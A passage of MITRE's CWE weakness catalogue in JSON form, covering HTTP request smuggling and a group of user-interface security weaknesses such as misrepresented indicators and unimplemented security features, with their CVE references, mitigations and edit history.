headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2093"},{"Reference":"CVE-2005-2094","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2094"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP Request Smuggling"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":26,"Entry_Name":"HTTP Request Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"105"}},{"attr":{"@_CAPEC_ID":"33"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-433"}}},"Notes":{"Note":{"#text":"Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"HTTP Request Smuggling","attr":{"@_Date":"2008-04-11"}},{"#text":"Interpretation Conflict in Web Traffic (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Inconsistent Interpretation of HTTP Requests (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2009-05-27"}}]}},"446":{"attr":{"@_ID":"446","@_Name":"UI Discrepancy for Security Feature","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state.","Extended_Description":"When the user interface does not properly reflect what the user asks of it, then it can lead the user into a false sense of security. For example, the user might check a box to enable a security option to enable encrypted communications, but the software does not actually enable the encryption. Alternately, the user might provide a \\"restrict ALL\'\\" access control rule, but the software only implements \\"restrict SOME\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1446","Description":"UI inconsistency; visited URLs list not cleared when \\"Clear History\\" option is selected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1446"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User interface inconsistency"}},"Notes":{"Note":{"#text":"This entry is likely a loose composite that could be broken down into the different types of errors that cause the user interface to have incorrect interactions with the underlying security feature.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationship_Notes, Weakness_Ordinalities"}],"Previous_Entry_Name":[{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-01-30"}},{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-04-11"}}]}},"447":{"attr":{"@_ID":"447","@_Name":"Unimplemented or Unsupported Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform functionality testing before deploying the application."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0127","Description":"GUI configuration tool does not enable a security option when a checkbox is selected, although that option is honored when manually set in the configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127"},{"Reference":"CVE-2001-0863","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0863"},{"Reference":"CVE-2001-0865","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0865"},{"Reference":"CVE-2004-0979","Description":"Web browser does not properly modify security setting when the user sets it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unimplemented or unsupported feature in UI"}},"Notes":{"Note":{"#text":"This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"448":{"attr":{"@_ID":"448","@_Name":"Obsolete Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function is obsolete and the product does not warn the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Remove the obsolete feature from the UI. Warn the user that the feature is no longer supported."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obsolete feature in UI"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"449":{"attr":{"@_ID":"449","@_Name":"The UI Performs the Wrong Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The UI performs the wrong action with respect to the user\'s request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform extensive functionality testing of the UI. The UI should behave as specified."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1387","Description":"Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2001-0081","Description":"Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0081"},{"Reference":"CVE-2002-1977","Description":"Product does not \\"time out\\" according to user specification, leaving sensitive data available after it has expired.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1977"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"The UI performs the wrong action"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"450":{"attr":{"@_ID":"450","@_Name":"Multiple Interpretations of UI Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"357","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretations of UI Input"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"451":{"attr":{"@_ID":"451","@_Name":"User Interface (UI) Misrepresentation of Critical Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.","Extended_Description":{"xhtml:p":["If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event.","UI misrepresentation can take many forms:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Incorrect indicator: incorrect information is displayed, which prevents the user from understanding the true state of the software or the environment the software is monitoring, especially of potentially-dangerous conditions or operations. This can be broken down into several different subtypes.","Overlay: an area of the display is intended to give critical information, but another process can modify the display by overlaying another element on top of it. The user is not interacting with the expected portion of the user interface. This is the problem that enables clickjacking attacks, although many other types of attacks exist that involve overlay.","Icon manipulation: the wrong icon, or the wrong color indicator, can be influenced (such as making a dangerous .EXE executable look like a harmless .GIF)","Timing: the software is performing a state transition or context switch that is presented to the user with an indicator, but a race condition can cause the wrong indicator to be used before the product has fully switched context. The race window could be extended indefinitely if the attacker can trigger an error.","Visual truncation: important information could be truncated from the display, such as a long filename with a dangerous extension that is not displayed in the GUI because the malicious portion is truncated. The use of excessive whitespace can also cause truncation, or place the potentially-dangerous indicator outside of the user\'s field of view (e.g. \\"filename.txt .exe\\"). A different type of truncation can occur when a portion of the information is removed due to reasons other than length, such as the accidental insertion of an end-of-input marker in the middle of an input, such as a NUL byte in a C-style string.","Visual distinction: visual information might be presented in a way that makes it difficult for the user to quickly and correctly distinguish between critical and unimportant segments of the display.","Homographs: letters from different character sets, fonts, or languages can appear very similar (i.e. may be visually equivalent) in a way that causes the human user to misread the text (for example, to conduct phishing attacks to trick a user into visiting a malicious web site with a visually-similar name as a trusted site). This can be regarded as a type of visual distinction issue."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"346","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform data validation (e.g. syntax, length, etc.) before interpreting the data."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Create a strategy for presenting information, and plan for how to display unusual characters."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2227","Description":"Web browser\'s filename selection dialog only shows the beginning portion of long filenames, which can trick users into launching executables with dangerous extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2227"},{"Reference":"CVE-2001-0398","Description":"Attachment with many spaces in filename bypasses \\"dangerous content\\" warning and uses different icon. Likely resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0398"},{"Reference":"CVE-2001-0643","Description":"Misrepresentation and equivalence issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0643"},{"Reference":"CVE-2005-0593","Description":"Lock spoofing from several different weaknesses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0593"},{"Reference":"CVE-2004-1104","Description":"Incorrect indicator: web browser can be tricked into presenting the wrong URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1104"},{"Reference":"CVE-2005-0143","Description":"Incorrect indicator: Lock icon displayed when an insecure page loads a binary file loaded from a trusted site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0143"},{"Reference":"CVE-2005-0144","Description":"Incorrect indicator: Secure \\"lock\\" icon is presented for one channel, while an insecure page is being simultaneously loaded in another channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0144"},{"Reference":"CVE-2004-0761","Description":"Incorrect indicator: Certain redirect sequences cause security lock icon to appear in web browser, even when page is not encrypted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0761"},{"Reference":"CVE-2004-2219","Description":"Incorrect indicator: Spoofing via multi-step attack that causes incorrect information to be displayed in browser address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219"},{"Reference":"CVE-2004-0537","Description":"Overlay: Wide \\"favorites\\" icon can overlay and obscure address bar","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0537"},{"Reference":"CVE-2005-2271","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2271"},{"Reference":"CVE-2005-2272","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2272"},{"Reference":"CVE-2005-2273","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2273"},{"Reference":"CVE-2005-2274","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2274"},{"Reference":"CVE-2001-1410","Description":"Visual distinction: Browser allows attackers to create chromeless windows and spoof victim\'s display using unprotected Javascript method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1410"},{"Reference":"CVE-2002-0197","Description":"Visual distinction: Chat client allows remote attackers to spoof encrypted, trusted messages with lines that begin with a special sequence, which makes the message appear legitimate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0197"},{"Reference":"CVE-2005-0831","Description":"Visual distinction: Product allows spoofing names of other users by registering with a username containing hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0831"},{"Reference":"CVE-2003-1025","Description":"Visual truncation: Special character in URL causes web browser to truncate the user portion of the \\"user@domain\\" URL, hiding real domain in the address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025"},{"Reference":"CVE-2005-0243","Description":"Visual truncation: Chat client does not display long filenames in file dialog boxes, allowing dangerous extensions via manipulations including (1) many spaces and (2) multiple file extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243"},{"Reference":"CVE-2005-1575","Description":"Visual truncation: Web browser file download type can be hidden using whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1575"},{"Reference":"CVE-2004-2530","Description":"Visual truncation: Visual truncation in chat client using whitespace to hide dangerous file extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2530"},{"Reference":"CVE-2005-0590","Description":"Visual truncation: Dialog box in web browser allows user to spoof the hostname via a long \\"user:pass\\" sequence in the URL, which appears before the real hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0590"},{"Reference":"CVE-2004-1451","Description":"Visual truncation: Null character in URL prevents entire URL from being displayed in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1451"},{"Reference":"CVE-2004-2258","Description":"Miscellaneous -- [step-based attack, GUI] -- Password-protected tab can be bypassed by switching to another tab, then back to original tab.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2258"},{"Reference":"CVE-2005-1678","Description":"Miscellaneous -- Dangerous file extensions not displayed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1678"},{"Reference":"CVE-2002-0722","Description":"Miscellaneous -- Web browser allows remote attackers to misrepresent the source of a file in the File Download dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0722"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UI Misrepresentation of Critical Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-434","@_Section":"7.16. Foil Semantic Attacks"}}},"Notes":{"Note":[{"#text":"This entry should be broken down into more precise entries. See extended description.","attr":{"@_Type":"Maintenance"}},{"#text":"Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-13","Modification_Importance":"Critical","Modification_Comment":"Defined several different subtypes of this issue."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, Other_Notes, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content 